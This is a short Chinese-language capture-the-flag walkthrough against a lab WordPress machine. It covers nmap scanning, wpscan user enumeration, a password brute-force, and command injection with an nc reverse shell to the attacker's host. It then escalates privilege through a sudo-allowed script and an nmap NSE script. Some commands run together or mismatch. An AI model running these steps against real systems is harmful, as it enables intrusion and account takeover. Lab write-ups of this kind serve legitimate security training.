nmap 扫描一下
nmap -A -p- 192.168.149.164
vim /etc/hosts
加上 192.168.149.164 wordy
访问 80 端口,发现是一个 wordpress 的站点
用 wpscan 扫描一下,发现了几个用户名
wpscan --url http://wordy -ru
在靶机下载的页面,根据作者善意提醒,制作一份密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
把扫描出来的用户名也保存出来,爆破一下
wpscan --url http://wordy -U users.txt -P passwords.txt
找到账户密码:mark/helpdesk01
登录后,后台的一个工具里面有个功能,存在命令执行漏洞
用 burp 抓一下包,看一下,在后面加上个 ;ls 成功回显了目录下的文件
nc 来拿一个 shell 吧
先 kali 里面 nc -lp 6666
访问的时候加上
; nc 192.168.149.141 6666 -e /bin/sh
python -c "import pty;pty.spawn('/bin/bash')"
开启一个好看点的 shell
在 mark 的目录下找到了一个用户名和密码 graham/GSo7isUM1D4
这个账户可以直接 ssh 登进来
ssh graham@192.168.149.164
登陆以后,sudo -l 发现一个不需要密码就可以用的
在后面追加一个 /bin/bash,这样运行的时候就能拿到 jens 的 shell 了
echo "/bin/bash" >> /home/jens/backups.shsudo -u jens /home/jens/backups.sh
再找一下,这次是 nmap
可以写个脚本,让 nmap 来执行脚本,然后拿到 shell
echo 'os.execute("/bin/sh")' > shell.nsesudo nmap --script getroot.nse